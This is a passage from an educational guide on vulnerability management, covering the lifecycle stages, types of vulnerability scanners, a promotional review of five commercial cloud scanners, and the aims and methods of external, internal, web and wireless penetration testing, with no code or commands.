place, stakeholders periodically revisit planning and prework to update their
overall guidelines and strategies as needed.

Stage 1: Asset discovery and vulnerability assessment


The formal vulnerability management lifecycle begins with an asset
inventory—a catalog of all the hardware and software on the organization’s
network. The inventory includes officially sanctioned apps and endpoints and
any shadow IT assets employees use without approval.
Because new assets are constantly added to company networks, the asset
inventory is updated before every round of the lifecycle. Companies often use
software tools like attack surface management platforms to automate their
inventories.
After identifying assets, the security team assesses them for vulnerabilities. The
team can use a combination of tools and methods, including automated
vulnerability scanners, manual penetration testing and external threat
intelligence from the cybersecurity community.
Assessing every asset during every round of the lifecycle would be onerous, so
security teams usually work in batches. Each round of the lifecycle focuses on a
specific group of assets, with more critical asset groups receiving scans more
often. Some advanced vulnerability scanning tools continuously assess all
network assets in real-time, enabling the security team to take an even more
dynamic approach to vulnerability discovery.

Stage 2: Vulnerability prioritization


The security team prioritizes the vulnerabilities they found in the assessment
stage. Prioritization ensures that the team addresses the most critical
vulnerabilities first. This stage also helps the team avoid pouring time and
resources into low-risk vulnerabilities.
To prioritize vulnerabilities, the team considers these criteria:
• Criticality ratings from external threat intelligence: This can include
MITRE’s list of Common Vulnerabilities and Exposures (CVE) or
the Common Vulnerability Scoring System (CVSS).
• Asset criticality: A noncritical vulnerability in a critical asset often
receives higher priority than a critical vulnerability in a less important
asset.
• Potential impact: The security team weighs what might happen if
hackers exploited a particular vulnerability, including the effects on
business operations, financial losses and any possibility of legal action.
• Likelihood of exploitation: The security team pays more attention to
vulnerabilities with known exploits that hackers actively use in the wild.
• False positives: The security team ensures that vulnerabilities actually
exist before dedicating any resources to them.

Stage 3: Vulnerability resolution


The security team works through the list of prioritized vulnerabilities, from
most critical to least critical. Organizations have three options to address
vulnerabilities:
1. Remediation: Fully addressing a vulnerability so it can no longer be
exploited, such as by patching an operating system bug, fixing a
misconfiguration or removing a vulnerable asset from the network.
Remediation isn’t always feasible. For some vulnerabilities, complete
fixes aren’t available at the time of discovery (e.g., zero-day
vulnerabilities). For other vulnerabilities, remediation would be too
resource-intensive.
2. Mitigation: Making a vulnerability more difficult to exploit or lessening
the impact of exploitation without removing the vulnerability entirely.
For example, adding stricter authentication and authorization measures to
a web application would make it harder for hackers to hijack accounts.
Crafting incident response plans for identified vulnerabilities can soften
the blow of cyberattacks. Security teams usually choose to mitigate when
remediation is impossible or prohibitively expensive.
3. Acceptance: Some vulnerabilities are so low-impact or unlikely to be
exploited that fixing them wouldn’t be cost-effective. In these cases, the
organization can choose to accept the vulnerability.
Stage 4: Verification and monitoring
To verify that mitigation and remediation efforts worked as intended, the
security team rescans and retests the assets they just worked on. These audits
have two primary purposes: to determine if the security team successfully
addressed all known vulnerabilities and ensure that mitigation and remediation
didn’t introduce any new problems.
As part of this reassessment stage, the security team also monitors the network
more broadly. The team looks for any new vulnerabilities since the last scan,
old mitigations that have grown obsolete, or other changes that may require
action. All of these findings help inform the next round of the lifecycle.

Stage 5: Reporting and improvement


The security team documents activity from the most recent round of the
lifecycle, including vulnerabilities found, resolution steps taken and outcomes.
These reports are shared with relevant stakeholders, including executives, asset
owners, compliance departments and others.
The security team also reflects on how the most recent round of the lifecycle
went. The team may look at key metrics like mean time to detect (MTTD),
mean time to respond (MTTR), total number of critical vulnerabilities and
vulnerability recurrence rates. By tracking these metrics over time, the security
team can establish a baseline for the vulnerability management program’s
performance and identify opportunities to improve the program over time.
Lessons learned from one round of the lifecycle can make the next round more
effective.

CLOUD BASED VULNERABILITY SCANNERS - I

Vulnerability management is a complex undertaking. Even with a formal


lifecycle, security teams might feel like they’re hunting for needles in haystacks
as they try to track down vulnerabilities in massive corporate networks.

Scanning for cloud-based vulnerabilities is an essential cybersecurity practice in


the tech world.

Network operators deploy basic security measures when managing a network,


but some hidden vulnerabilities can be difficult to detect. Hence, the need for
automated cloud security scans arises.
Tech enthusiasts are expected to be able to perform basic vulnerability scanning
of the cloud environment. This process starts with learning about cloud security
scanning tools that can help automate the detection of cloud vulnerabilities on a
network.

Several vulnerability scanners are available at little to no cost, but it is essential


to know the most efficient ones.

What is a Vulnerability Scanner?

A Vulnerability Scanner is a software tool designed to examine applications and


networks for misconfiguration and security flaws automatically. These scanning
tools perform automated security tests to identify security threats in a cloud
network.

In addition, they have a constantly updated database of cloud vulnerabilities that


allows them to conduct effective security scanning.

How to Select the Right Vulnerability Scanner

It is essential to use a suitable vulnerability scanner for cloud security. Many


vulnerability scanning tools are available on the internet, but not all will offer
what cloud security testers are looking for in automated vulnerability scanners.

So, here are some factors to look out for when selecting a vulnerability scanning
tool.

Select a vulnerability scanner that:

• scans complex web applications


• monitors critical systems and defenses
• recommends remediation for vulnerabilities
• complies with regulations and industry standards
• has an intuitive dashboard that displays risk scores

It is essential to compare and review tools used in scanning and testing cloud
vulnerabilities. They offer unique benefits that ensure system networks and web
applications run smoothly and are safe for use in organizations and private
businesses.

Vulnerability scanning tools offer cloud monitoring and security protection


benefits such as:

• Scanning systems and networks for security vulnerabilities


• Performing ad-hoc security tests whenever they are needed
• Tracking, diagnosing, and remediating cloud vulnerabilities
• Identifying and resolving wrong configurations in networks

Here are the top 5 vulnerability scanners for cloud security:

Intruder Cloud Security

Intruder is a Cloud Vulnerability Scanning Tool specially designed for scanning


AWS, Azure, and Google Cloud. This is a highly proactive cloud-based
vulnerability scanner that detects every form of cybersecurity weakness in
digital infrastructures.

The intruder is highly efficient because it finds cyber security weaknesses in


exposed systems to avoid costly data breaches.

The strength of this vulnerability scanner for cloud-based systems is in its


perimeter scanning abilities. It is designed to discover new vulnerabilities to
ensure the perimeter can’t be easily breached or hacked. In addition, it adopts a
streamlined approach to bugs and risk detection.

Hackers will find it exceedingly difficult to breach a network if an Intruder


Cloud Security Scanner is used. It will detect all the weaknesses in a cloud
network to help prevent hackers from finding those weaknesses.

The intruder also offers a unique threat interpretation system that makes the
process of identifying and managing vulnerabilities an easy nut to crack. This is
highly recommended.

Aqua Cloud Security

Aqua Cloud Security is a vulnerability scanner designed for scanning,


monitoring, and remediating configuration issues in public cloud accounts
according to best practices and compliance standards across cloud-based
platforms such as AWS, Azure, Oracle Cloud, and Google Cloud.

It offers a complete Cloud-Native Application Protection Platform.

This is one of the best vulnerability scanners used for cloud-native security in
organizations. Network security operators use this vulnerability scanner for
vulnerability scanning, cloud security posture management, dynamic threat
analysis, Kubernetes security, serverless security, container security, virtual
machine security, and cloud-based platform integrations.
Aqua Cloud Security Scanner offers users different CSPM editions that
include SaaS and Open-Source Security. It helps secure the configuration of
individual public cloud services with CloudSploit and performs comprehensive
solutions for multi-cloud security posture management.

Mistakes are almost inevitable within a complex cloud environment, and if not
adequately checked, it could lead to misconfiguration that can escalate to
serious security issues.

Hence, Aqua Cloud Security devised a comprehensive approach to prevent data


breaches.

Qualys Cloud Security

Qualys Cloud Security is an excellent cloud computing platform designed to


identify, classify, and monitor cloud vulnerabilities while ensuring compliance
with internal and external policies.

This vulnerability scanner prioritizes scanning and remediation by automatically


finding and eradicating malware infections on web applications and system
websites.

Qualys provides public cloud integrations that allow users to have total
visibility of public cloud deployments.

Most public cloud platforms operate on a “shared security responsibility”


model, which means users are expected to protect their workload in the cloud.
This can be a daunting task if done manually, so most users will rather employ
vulnerability scanners.

Qualys provides complete visibility with end-to-end IT security and compliance


with hybrid IT and AWS deployments. It continuously monitors and assesses
AWS assets and resources for security issues, misconfigurations, and non-
standard deployments.

It is the perfect vulnerability scanner for scanning cloud environments and


detecting vulnerabilities in complex internal networks.

It has a central single-panel-of-glass interface and CloudView dashboard that


allows users to view monitored web apps and all AWS assets across multiple
accounts through a centralized UI.
Rapid7 Insight Cloud Security

Rapid7 InsightCloudSec platform is one of the best vulnerability scanners for


cloud security. This vulnerability scanner is designed to keep cloud services
secure.

It features an insight platform that provides web application security,


vulnerability management, threat command, bug detection, and response,
including cloud security expert management and consulting services.

The secure cloud services provided by Rapid7 InsightCloudSec help to drive the
business forward in the best possible ways. It also enables users to drive
innovation through continuous security and compliance.

This cloud security platform offers excellent benefits, including cloud workload
protection, security posture management, and identity and access management.

Rapid7 is a fully-integrated cloud-native platform that offers features such as;


risk assessment and auditing, unified visibility and monitoring, automation and
real-time remediation, governance of cloud identity and access management,
threat protection, extensible platform, and infrastructure as code security,
Kubernetes security guardrails, and posture management. The list is endless.

CrowdStrike Cloud Security

CrowdStrike Cloud Security is a top vulnerability scanner designed for cloud


security services. It stops cloud breaches with unified cloud security posture
management and breach prevention for multi-cloud and hybrid environments in
a single platform.

This platform has transformed how cloud security automation is carried out for
web applications and networks.

CrowdStrike offers full-stack cloud-native security and protects workloads,


hosts, and containers. It enables DevOps to detect and fix issues before they
impact a system negatively.

In addition, security teams can use this cloud security scanner to defend against
cloud breaches using cloud-scale data and analytics.

This vulnerability scanner will create less work for cloud security and DevOps
teams because cloud deployments are automatically optimized with unified
protection.
Its features include automated cloud vulnerability discovery, detecting and
preventing threats, and continuous runtime protection, including EDR for cloud
workloads and containers.

Furthermore, it allows web developers to build and run web applications


knowing they are fully protected from a data breach. As a result, when threats
are hunted and eradicated, cloud applications will run smoothly and faster while
working with the utmost efficiency.

Conclusion

Vulnerability scanners are essential for cloud security because they can easily
detect system weaknesses and prioritize effective fixes. This will help reduce
the workload on security teams in organizations. Each of the vulnerability
scanners reviewed in this guide offers excellent benefits.

These vulnerability scanners allow users to perform scans by logging into the
website as authorized users. When this happens, it automatically monitors and
scans areas of weakness in the systems.

It also identifies any form of anomalies in a network packet configuration to


block hackers from exploiting system programs. Automated vulnerability
assessment is very crucial for cloud security services.

So, vulnerability scanners can detect thousands of vulnerabilities and identify


the actual risk of these vulnerabilities by validating them.

Once these have been achieved, they then prioritize remediation based on the
risk level of these vulnerabilities. All five vulnerability scanners reviewed are
tested and trusted, so users do not need to worry about any form of deficiency.
CLOUD-BASED VULNERABILITY SCANNERS - II
The realm of cloud computing is a double-edged sword. While it offers
unparalleled scalability, agility, and cost-effectiveness, security remains
paramount. In this ever-evolving landscape, cloud-based vulnerability scanners
emerge as our digital guardians, relentlessly identifying weaknesses and
safeguarding our cloud environment. Let's embark on a detailed exploration of
these essential tools, delving into their intricate mechanisms, diverse
applications, and the distinct types available.
Mechanism: Unveiling the Inner Workings
Imagine a meticulous security guard equipped with a comprehensive security
handbook. Cloud vulnerability scanners function in a similar manner,
employing a multi-layered approach:
• Database Matchup: A Catalog of Threats: Scanners possess a vast
database, meticulously curated with known vulnerabilities. These
vulnerabilities, often referred to as Common Vulnerabilities and
Exposures (CVEs), represent security loopholes in software and systems.
The scanner meticulously compares your cloud environment's
configuration and software versions against this extensive database. Any
potential matches are flagged, alerting you to potential security risks.
• Probing and Inspection: Mimicking the Attacker: Cloud vulnerability
scanners don't just sit passively. They actively probe your cloud
resources, simulating the actions of a potential attacker. By mimicking
various attack techniques, the scanner analyzes the system's responses
and identifies weaknesses that could be exploited if left unaddressed.
• Configuration Scrutiny: Eliminating Misconfiguration Nightmares:
Improper configurations are a security Achilles' heel. Cloud vulnerability
scanners meticulously examine your cloud settings, searching for
deviations from established security best practices. These deviations can
expose vulnerabilities that attackers can easily exploit. By identifying
these misconfigurations, scanners empower you to rectify them and
fortify your cloud environment.

The Benefits: A Shield Against Cyber Threats


Cloud vulnerability scanners offer a multitude of advantages, acting as a shield
against cyber threats:
• Proactive Defense: Patching Before the Storm: By proactively
identifying vulnerabilities before malicious actors do, you gain a
significant advantage. With this knowledge, you can promptly apply
security patches, significantly reducing the risk of a security breach.
• Efficiency and Automation: Replacing Manual Drudgery: Manual
security audits are time-consuming and prone to human error. Cloud
vulnerability scanners automate the entire process, saving your security
team valuable time and resources. They can perform comprehensive
scans at regular intervals, ensuring your cloud environment remains
constantly vigilant.
• Improved Compliance: Aiding Regulatory Harmony: Many
regulations mandate regular security assessments for organizations
operating in the cloud. Cloud vulnerability scanners help you effortlessly
demonstrate compliance with these regulations by providing detailed
reports that can be presented to auditors.
• Prioritization and Focus: Addressing Critical Issues First: Not all
vulnerabilities are created equal. Cloud vulnerability scanners prioritize
vulnerabilities based on their severity. This allows your security team to
focus their efforts on addressing the most critical issues first, optimizing
their remediation efforts.
The Cavalry Arrives: Types of Cloud Vulnerability Scanners
When it comes to cloud vulnerability scanners, there are two main types to
consider, each with its own strengths:
• Cloud-Native Scanners: Deep Insights, Seamless Integration: These
scanners are designed specifically for cloud environments. They integrate
seamlessly with major cloud providers like AWS, Azure, and GCP. This
deep integration allows them to offer unparalleled insights into your
cloud resources and configurations, providing a more comprehensive
view of your security posture.
• Agent-Based Scanners: Granular Visibility, Lightweight Footprint:
These scanners require the installation of a lightweight agent on each of
your cloud instances. This agent acts as the scanner's eyes and ears within
your cloud environment, continuously collecting detailed information
about the system's security posture. The agent then communicates this
information back to the scanner, providing a granular view of your cloud
security.
Choosing Your Champion: Selection Criteria for Optimal Defense
Selecting the right cloud vulnerability scanner depends on your specific needs
and cloud environment. Here are some key factors to consider when making
your choice:
• Cloud Compatibility: Ensuring Seamless Integration: Ensure the
scanner you choose integrates well with your chosen cloud platform.
Incompatibility can lead to difficulties and hinder the scanner's
effectiveness.
• Vulnerability Coverage: A Broad Spectrum of Defense: The scanner
should cover a wide range of vulnerabilities, including network security
flaws, system misconfigurations, and web application vulnerabilities. A
comprehensive scanner ensures no security gaps remain exposed.
• Reporting and Alerting: Knowledge is Power, Real-Time Awareness
is Essential: The scanner should provide detailed reports that prioritize
vulnerabilities based on their severity and offer clear recommendations
for remediation. Additionally, real-time alerts for critical vulnerabilities
are essential for immediate response.
• Ease of Use: User-Friendly Interface for Optimal Efficiency: The
scanner's interface should be user-friendly and intuitive, even for those
without a deep security background. A simple and easy-to-use interface
empowers a wider range of users to leverage the scanner

HOST-BASED VULNERABILITY SCANNERS


In the never-ending battle for cybersecurity, host-based vulnerability scanners
emerge as our vigilant sentinels. They tirelessly patrol our servers, workstations,
and other network devices, identifying weaknesses and safeguarding them from
cyber threats. Let's embark on a deep dive into these essential tools, exploring
their intricate mechanisms, diverse applications, and the distinct variations
available.

Mechanism: A Multi-Pronged Approach to Uncovering Flaws

Imagine a security inspector meticulously examining every corner of a building,


searching for vulnerabilities. Host-based vulnerability scanners function in a
similar manner, employing a multi-pronged approach:

• Operating System and Software Scrutiny: Scanners meticulously


examine the operating systems and software installed on a host. They
compare the versions against a vast database of known vulnerabilities,
identifying any outdated software or systems with known security flaws.
• Configuration Inspection: Unmasking Security Gaps
Misconfigurations create security gaps that attackers can exploit.
Scanners delve into the host's configuration settings, searching for
deviations from security best practices. These deviations can expose
vulnerabilities such as unnecessary open ports or weak password policies.
• Active Probing: Simulating an Attacker's Tactics Scanners don't just
sit passively. They actively probe the host, mimicking the tactics of
potential attackers. This involves techniques like port scanning and
vulnerability exploitation attempts (in a controlled manner) to identify
weaknesses that could be exploited in a real attack.
The Benefits: Fortifying Your Digital Defenses

Host-based vulnerability scanners offer a multitude of advantages, fortifying


your digital defenses:

• Proactive Threat Detection: Patching Before a Breach By proactively


identifying vulnerabilities before attackers do, you gain a significant
advantage. With this knowledge, you can promptly apply security patches
and updates, significantly reducing the risk of a security breach.
• Improved Patch Management: Prioritization and Efficiency Patch
management can be a complex task. Host-based scanners prioritize
vulnerabilities based on their severity, allowing you to focus your
patching efforts on the most critical issues first. This optimizes your patch
management process and ensures your systems remain up-to-date.
• Enhanced Compliance: Meeting Regulatory Requirements Many
regulations mandate regular security assessments for organizations. Host-
based vulnerability scanners help you demonstrate compliance with these
regulations by providing detailed reports that can be presented to
auditors.
• Detection of Rogue Software and Unauthorized Modifications
Scanners can identify the presence of unauthorized or unapproved
software installed on a host. This can be a sign of malware infection or
unauthorized modifications by users.
The Reinforcements Arrive: Types of Host-Based Vulnerability Scanners

There are two main types of host-based vulnerability scanners to consider, each
with its own deployment strategy:

• Agent-Based Scanners: In-Depth Visibility with a Local Presence


These scanners require the installation of a lightweight agent on each host
you want to scan. This agent continuously monitors the system's security
posture and communicates detailed information back to a central scanner.
This approach offers in-depth visibility into the host's security state.
• Agentless Scanners: Lightweight and Scalable, But Potentially Less
Detailed Agentless scanners don't require any software installation on the
target hosts. They leverage remote access protocols or network traffic
analysis to scan for vulnerabilities. While offering greater ease of
deployment and scalability, they may not provide the same level of
detailed information as agent-based scanners.
Choosing Your Champion: Selection Criteria for Optimal Security

Selecting the right host-based vulnerability scanner depends on your specific


needs and IT environment. Here are some key factors to consider when making
your choice:

• Operating System Compatibility: Ensuring Seamless Scans Ensure


the scanner you choose is compatible with the operating systems used on
your hosts. Incompatibility can lead to difficulties and hinder the
scanner's effectiveness.
• Vulnerability Coverage: A Broad Spectrum of Defense The scanner
should cover a wide range of vulnerabilities, including operating system
flaws, software misconfigurations, and common security vulnerabilities.
A comprehensive scanner ensures no security gaps remain exposed.
• Reporting and Alerting: Knowledge is Power The scanner should
provide detailed reports that prioritize vulnerabilities based on their
severity and offer clear recommendations for remediation. Additionally,
real-time alerts for critical vulnerabilities are essential for immediate
response.
• Deployment Model: Agent-Based or Agentless? Consider the trade-off
between in-depth visibility (agent-based) and ease of deployment
(agentless) when choosing your scanner.
• Scalability: Addressing a Growing Network If you have a large and
growing network, consider the scanner's scalability to ensure it can
effectively scan all your hosts.

By employing host-based vulnerability scanners, you equip yourself with


vigilant sentinels that tirelessly guard your network devices. With their keen eye
for vulnerabilities, these tools empower you to proactively identify and address
security weaknesses, creating
NETWORK-BASED VULNERABILITY SCANNERS

Keeping your network secure is a constant battle, like having a vigilant security guard patrolling
your neighborhood every night. Network-based vulnerability scanners act as
these digital guards, tirelessly scanning your network to identify potential entry
points for attackers. Let's delve deeper into how these scanners work, why
they're crucial for your network security, and explore the different types
available.
Under the Hood: How Network Scanners Spot Weaknesses
Imagine a security guard meticulously examining every house in your
neighborhood, checking for unlocked doors, broken windows, and flimsy
security systems. Network vulnerability scanners function similarly, employing
a multi-step process:
1. Network Mapping: Creating a Digital Blueprint: The scanner acts like
a cartographer, meticulously mapping your entire network. It identifies
and lists every device connected to your network, from computers and
servers to printers and even internet-of-things (IoT) devices. This
comprehensive map allows the scanner to understand the overall network
layout and identify potential vulnerabilities.
2. Seeing Like an Attacker: Mimicking Malicious Techniques: Scanners
don't just passively observe; they actively simulate attacker behavior.
They use techniques similar to what hackers might employ, such as port
scanning to identify open ports on devices. These open ports can act as
gateways for attackers to gain access to your network and launch attacks.
3. Scrutinizing Security Configurations: Checking Your Network's
Defenses: Just like a security guard checking the strength of door locks,
network scanners examine the security configurations of your network
devices. This includes aspects like password complexity, firewall rules,
and unnecessary services running on devices. Weak configurations create
security gaps that attackers can exploit to gain a foothold in your
network.
The Benefits: Why Network Scanners are Essential
Network vulnerability scanners offer a multitude of advantages, acting as a
shield against cyber threats:
• Proactive Defense: Patching Before the Storm Breaks: By identifying
vulnerabilities before attackers do, you gain a significant advantage. With
this knowledge, you can take proactive measures such as applying
security patches and updating software. This significantly reduces the risk
of a security breach and safeguards your valuable data.
• Efficiency and Automation: Replacing Manual Drudgery: Manually
checking every device on your network for vulnerabilities is a time-
consuming and error-prone task. Network vulnerability scanners
automate the entire process, saving your IT security team valuable time
and resources. They can perform comprehensive scans at regular
intervals, ensuring your network's security posture remains constantly
monitored.
• Improved Compliance: Meeting Regulatory Requirements: Many
regulations in various industries mandate regular security assessments for
organizations. Network vulnerability scanners help you effortlessly
demonstrate compliance with these regulations by providing detailed
reports that can be presented to auditors. These reports list the identified
vulnerabilities along with their severity levels, allowing you to prioritize
remediation efforts.
• Prioritization and Focus: Addressing Critical Issues First: Not all
vulnerabilities are created equal. Some pose a much higher threat than
others. Network vulnerability scanners prioritize vulnerabilities based on
their severity. This allows your security team to focus their efforts on
addressing the most critical issues first, optimizing their remediation
efforts and maximizing the network's overall security posture.
The Cavalry Arrives: Different Types of Network Scanners
When it comes to network vulnerability scanners, there are two main types to
consider, each with its own advantages:
• External Scanners: Simulating an Attacker's Perspective: These
scanners operate from outside your network, mimicking the tactics of an
external attacker attempting to gain unauthorized access. They provide a
valuable external perspective on your network security posture,
highlighting vulnerabilities that attackers might exploit. External scanners
are ideal for getting a general overview of your network's security from
an attacker's standpoint.
• Internal Scanners: Providing a Detailed View from Within: These
scanners operate from within your network, offering a more granular
view of vulnerabilities on individual devices. They can provide detailed
information about specific security configurations, software versions, and
potential weaknesses on each device. Internal scanners are essential for
getting a comprehensive understanding of your network's security from
the inside out.
Choosing Your Champion: Selection Criteria for Optimal Network
Security
Selecting the right network vulnerability scanner depends on your specific
network size, security needs, and technical expertise. Here are some key factors
to consider when making your choice:
• Network Size and Complexity: If you have a large and complex
network with hundreds or even thousands of devices, you'll need a
scanner that can handle the workload efficiently and scale to
accommodate future growth.
• Ease of Use and Reporting Features: The scanner's interface should be
user-friendly and intuitive, even for those without a deep security
background. Additionally, detailed reporting features are essential. The
reports should clearly list identified vulnerabilities, prioritize them based
on severity, and offer clear recommendations for remediation.
• Integration with Security Tools: Consider if the scanner integrates well
with your existing security
DATABASE VULNERABILITY SCANNERS
In the digital realm, our databases are treasure troves of sensitive information.
Protecting them from unauthorized access and malicious attacks is paramount.
Database vulnerability scanners emerge as our digital guardians, meticulously
examining these data repositories for weaknesses that could be exploited. Let's
embark on a detailed exploration of these essential tools, delving into their
intricate mechanisms, diverse applications, and the distinct variations available.
Mechanism: A Keen Eye for Data Security Flaws
Imagine a security guard meticulously examining every vault within a bank.
Database vulnerability scanners function similarly, employing a multi-pronged
approach:
• Database Fingerprinting: Scanners act like security experts, first
identifying the specific type of database management system (DBMS)
you're using, such as MySQL, Oracle, or SQL Server. Understanding the
DBMS is crucial as vulnerabilities can differ between systems.
• Configuration Scrutiny: Misconfigurations are security nightmares for
databases. Scanners meticulously examine your database settings,
searching for deviations from security best practices. This includes
aspects like weak password policies, unnecessary user permissions, and
disabled auditing logs. These deviations can expose vulnerabilities that
attackers can exploit to gain unauthorized access or manipulate data.
• Query-Based Vulnerability Detection: Scanners don't just inspect
passively. They actively probe your database using specially crafted
queries. These queries mimic techniques that attackers might use to
identify vulnerabilities in the database structure or exploit weaknesses in
access controls.
The Benefits: Fortifying Your Database Defenses
Database vulnerability scanners offer a multitude of advantages, fortifying your
database defenses:
• Proactive Threat Detection: Patching Before a Breach By proactively
identifying vulnerabilities before attackers do, you gain a significant
advantage. With this knowledge, you can promptly apply security patches
and address configuration issues. This significantly reduces the risk of a
data breach and safeguards your sensitive information.
• Improved Database Security Posture: Scanners provide a
comprehensive assessment of your database's security posture,
highlighting areas of strength and weakness. This allows you to prioritize
security improvements and allocate resources effectively to fortify your
database defenses.
• Enhanced Compliance: Meeting Regulatory Requirements Many
regulations mandate regular security assessments for organizations that
handle sensitive data. Database vulnerability scanners help you
demonstrate compliance with these regulations by providing detailed
reports that can be presented to auditors.
• Detection of Unauthorized Access Attempts: Scanners can identify
suspicious activity within your database, such as attempts to access
unauthorized data or escalate user privileges. This allows you to take
immediate action to investigate and prevent potential security breaches.
The Reinforcements Arrive: Types of Database Vulnerability Scanners
There are two main types of database vulnerability scanners to consider, each
with its own deployment method:
• Agent-Based Scanners: In-Depth Visibility with a Local Presence
These scanners require the installation of a lightweight agent on the
database server. This agent continuously monitors the database's security
posture and communicates detailed information back to a central scanner.
This approach offers in-depth visibility into the database's security state,
allowing for real-time monitoring and detection of suspicious activity.
• Agentless Scanners: Lightweight and Scalable, But Potentially Less
Detailed Agentless scanners don't require any software installation on the
database server. They leverage remote access protocols or analyze
database traffic to scan for vulnerabilities. While offering greater ease of
deployment and scalability, they may not provide the same level of
detailed information and real-time monitoring as agent-based scanners.
Choosing Your Champion: Selection Criteria for Optimal Security
Selecting the right database vulnerability scanner depends on your specific
needs and database environment. Here are some key factors to consider when
making your choice:
• Database Management System (DBMS) Compatibility: Ensure the
scanner you choose is compatible with the specific DBMS you're using.
Incompatibility can lead to difficulties and hinder the scanner's
effectiveness.
• Vulnerability Coverage: A Broad Spectrum of Defense The scanner
should cover a wide range of database vulnerabilities, including
misconfigurations, SQL injection flaws, and weaknesses in access control
mechanisms. A comprehensive scanner ensures no security gaps remain
exposed.
• Reporting and Alerting: Knowledge is Power The scanner should
provide detailed reports that prioritize vulnerabilities based on their
severity and offer clear recommendations for remediation. Additionally,
real-time alerts for critical vulnerabilities are essential for immediate
response.
• Deployment Model: Agent-Based or Agentless? Consider the trade-off
between in-depth visibility and ease of deployment when choosing your
scanner. Agent-based scanners offer real-time monitoring but require
agent installation, while agentless scanners are easier to deploy but may
lack real-time capabilities.
By employing database vulnerability scanners, you equip yourself with vigilant
guardians that tirelessly protect your data troves. With their keen eye for
vulnerabilities, these tools empower you to proactively identify and address
security weaknesses, creating a robust defense against cyber threats.
EXTERNAL NETWORK PENETRATION TESTING

External Network Penetration Testing is designed to simulate attacks from


outside the organization to identify vulnerabilities in the external-facing
infrastructure. This testing helps ensure that systems accessible from the
internet or other external networks are secure. The main areas of focus in
external network penetration testing include:

1. Firewall Configuration Testing:


- Objective: Assess the firewall rules and configurations to ensure they are
correctly set up to block unauthorized access while allowing legitimate traffic.
- Method: Penetration testers review the firewall rules and policies, perform
penetration attempts to bypass the firewall, and identify any misconfigurations
or weaknesses.
- Outcome: Recommendations for strengthening firewall rules, improving
configurations, and closing any security gaps identified.

2. Internet Vulnerability Scanning:


- Objective: Identify vulnerabilities in services and applications exposed to the
internet.
- Method: Automated tools scan the organization’s public IP addresses and
domain names to detect open ports, exposed services, and known
vulnerabilities.
- Outcome: A detailed report of vulnerabilities, including their severity and
potential impact, along with recommended remediation steps.

3. Perimeter Network Testing:


- Objective: Assess the security of the network perimeter, including devices
and systems located just inside the external router.
- Method: Testers simulate attacks from an external attacker’s perspective to
identify vulnerabilities in the perimeter network, such as misconfigured devices,
unpatched systems, and weak security controls.
- Outcome: Insights into perimeter security weaknesses and guidance on
enhancing security measures.

4. Email Testing:
- Objective: Evaluate the security of email systems and identify vulnerabilities
that could be exploited.
- Method: Testers examine email servers, protocols (e.g., SMTP, IMAP,
POP3), and configurations to identify weaknesses such as open relays,
misconfigurations, and susceptibility to phishing or spoofing attacks.
- Outcome: Recommendations for securing email systems, improving
configurations, and mitigating identified risks.

5. Firewall Bypass Testing:


- Objective: Determine how resistant the firewall and associated systems are
to penetration attempts.
- Method: Testers attempt to exploit known vulnerabilities and
misconfigurations to bypass the firewall and gain unauthorized access.
- Outcome: Identification of firewall weaknesses and suggested improvements
to harden firewall defenses.

6. System Access via Modems:


- Objective: Identify vulnerabilities in modem connections that could provide
unauthorized access to internal systems.
- Method: Testers use tools to detect active modems and assess the security of
the connections they provide.
- Outcome: Identification of vulnerable modem connections and
recommendations for securing or disabling them.

7. Telephone Scanning:
- Objective: Detect unauthorized or insecure modems connected to the
organization’s phone lines.
- Method: Testers use techniques to scan phone lines for modem tones and
assess their security.
- Outcome: Identification of insecure modem connections and advice on
mitigating risks.
By performing external network penetration testing, organizations can
proactively identify and address vulnerabilities that could be exploited by
external attackers, thereby enhancing their overall security posture.

EXTERNAL VS INTERNAL PENETRATION TEST

INTERNAL NETWORK PENETRATION TESTING

Internal Network Penetration Testing focuses on evaluating the security of an


organization’s internal IT environment to identify vulnerabilities that could be
exploited by an attacker with some level of authorized access. This testing helps
organizations understand the potential impact of insider threats or attackers who
have already breached the external defenses. The main areas of focus in internal
network penetration testing include:

1. Network Level Testing:


- Objective: Identify vulnerabilities in internal network services that could
allow unauthorized access or lateral movement within the network.
- Method: Tester’s scan and probe internal network devices, services, and
configurations to identify weaknesses such as open ports, unpatched systems,
and insecure protocols.
- Outcome: A report detailing network vulnerabilities, their potential impact,
and recommended remediation actions.

2. Computer Level Testing:


- Objective: Assess the security of operating systems and applications running
on networked devices.
- Method: Testers perform vulnerability scans, configuration reviews, and
exploit attempts on workstations, servers, and other networked devices.
- Outcome: Identification of security misconfigurations, unpatched
vulnerabilities, and insecure software installations, along with recommendations
for mitigation.

3. User Level Testing:


- Objective: Determine the potential impact of insider threats by testing the
access levels of different user roles.
- Method: Testers use valid user credentials to access systems and data,
simulating insider attacks to identify privilege escalation opportunities and
access control weaknesses.
- Outcome: Insights into user role-based vulnerabilities and guidance on
strengthening access controls and user permissions.

WEB APPLICATION PENETRATION TESTING

Web Application Penetration Testing is essential for identifying security


vulnerabilities in web-based applications that could be exploited by attackers.
This type of testing helps ensure that web applications are secure against
common threats such as SQL injection, cross-site scripting (XSS), and other
OWASP Top Ten vulnerabilities.
The main areas of focus in web application penetration testing include:

1. Unauthenticated Testing:
- Objective: Identify vulnerabilities that can be exploited without requiring
user authentication.
- Method: Testers use automated and manual techniques to probe the web
application’s public-facing components, such as login pages, forms, and APIs,
for security weaknesses.
- Outcome: Identification of unauthenticated vulnerabilities and
recommendations for securing public-facing components.

2. Authenticated Testing:
- Objective: Assess the security of the web application when accessed with
valid user credentials.
- Method: Testers log in to the application using various user roles and test for
privilege escalation vulnerabilities, insecure direct object references, and
weaknesses in authentication and authorization mechanisms.
- Outcome: Identification of authenticated vulnerabilities and guidance on
improving authentication and authorization controls.
WIRELESS PENETRATION TESTING

Wireless Penetration Testing evaluates the security of an organization’s Wi-Fi


networks to ensure they are not vulnerable to attacks that could compromise the
entire network. This testing helps organizations identify and address weaknesses
in wireless security configurations and protocols.

The main areas of focus in wireless penetration testing include:

1. WLAN Security Audit:


- Objective: Simulate attacks against wireless authentication, encryption, and
network protocols to identify vulnerabilities.
- Method: Testers use tools to perform attacks such as MAC spoofing, WEP
cracking, WPA/WPA2 brute-forcing, and "man-in-the-middle" attacks.
- Outcome: A report detailing WLAN vulnerabilities and recommendations
for strengthening wireless security.

2. Rogue Access Point Testing:


- Objective: Detect unauthorized access points and assess their impact on
network security.
- Method: Testers set up rogue access points and monitor network traffic to
identify devices connecting to them and capture sensitive information.
- Outcome: Identification of rogue access points and recommendations for
preventing unauthorized devices from connecting to the network.

